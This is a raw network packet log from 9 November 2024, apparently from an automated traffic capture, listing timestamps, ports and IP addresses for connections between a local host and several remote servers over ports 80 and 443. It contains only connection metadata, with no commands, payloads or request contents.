Nov 9, 2024 02:47:34.545871019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545881987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545905113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545916080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545921087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545921087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545924902 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.545931101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545948029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545954943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545967102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545978069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545979023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545984030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545996904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545998096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546029091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546050072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546207905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546215057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546217918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546253920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546278954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546303988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546314001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546345949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546361923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546390057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546401978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546418905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546431065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546442986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546447992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546468019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546475887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546494961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546497107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546508074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546519041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546519995 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546530008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546533108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546542883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546555042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546559095 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546597004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546611071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546684980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546734095 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546749115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546761036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546772957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546802998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546802998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546818972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546827078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546832085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546848059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546860933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546876907 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546892881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546966076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546973944 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.546977997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.546991110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547018051 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547033072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547069073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547071934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547076941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547082901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547127008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547152042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547187090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547199011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547199011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547224998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547236919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547245979 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547249079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547261953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547280073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547280073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547292948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547303915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547331095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547339916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547339916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547350883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547368050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547369957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547384024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547391891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547404051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547410011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547416925 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547429085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547441006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547442913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547460079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547461987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547470093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547476053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547496080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547499895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547512054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547518015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547524929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547542095 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547555923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547568083 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547571898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547585964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547600031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547636986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547641993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547641993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547641993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547648907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547667027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547691107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547696114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547707081 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547708988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547732115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547735929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547751904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547755003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547771931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547777891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547786951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547795057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547799110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547812939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547812939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547827005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547831059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547840118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547844887 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547859907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547869921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547873020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547885895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547894955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547898054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547910929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547919989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547924042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547934055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547945023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547947884 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547971010 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547982931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.547990084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.547996998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548016071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548027992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548038960 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548042059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548055887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548059940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548079014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548085928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548099041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548118114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548126936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548131943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548146963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548157930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548160076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548168898 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548171997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548197031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548217058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548242092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548255920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548281908 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548295021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548311949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548335075 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548367023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548377991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548389912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548403978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548403978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548415899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548434973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548460960 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548521042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548533916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548546076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548557043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548568010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548571110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548590899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548590899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548604012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548619032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548619986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548634052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548646927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548660994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548669100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548675060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548686028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548696995 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548706055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548717976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548722982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548732042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548743010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548748970 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548775911 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548782110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548805952 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548831940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548854113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548866987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548893929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548913002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548935890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548949003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548959017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548971891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548981905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.548988104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.548995972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549009085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549011946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549030066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549037933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549057961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549088955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549113989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549125910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549135923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549166918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549194098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549259901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549278021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549290895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549304008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549308062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549315929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549321890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549329996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549344063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549343109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549357891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549372911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549379110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549392939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549412966 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549721956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549742937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549758911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549767017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549796104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549808025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549817085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549820900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549833059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549846888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549864054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549869061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549885988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549897909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.549911022 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.549942017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550009966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550021887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550034046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550050020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550055981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550079107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550113916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550364017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550376892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550389051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550412893 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550425053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550437927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550451040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550451994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550463915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550477028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550498962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550497055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550518036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550529003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550540924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550550938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550563097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.550565004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.550606966 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.564790010 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.564806938 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.568895102 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.568902969 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.582014084 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.582022905 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.647897005 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.647923946 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.647933960 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.647947073 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.647974968 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.647978067 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.647991896 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.648050070 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.650760889 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.650784016 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.650881052 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.650887966 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.650899887 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.650958061 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.650964975 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.676434994 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.676461935 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.676521063 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.676531076 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.676609993 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.676664114 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.676671028 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.677248001 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.677297115 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.677304983 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.677321911 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.677392006 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.727767944 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.727776051 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.741553068 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.742078066 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.746392965 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.747471094 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.748744011 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.748758078 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.749790907 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.749896049 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.750364065 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.750437021 CET	443	53035	13.107.246.57	192.168.2.7
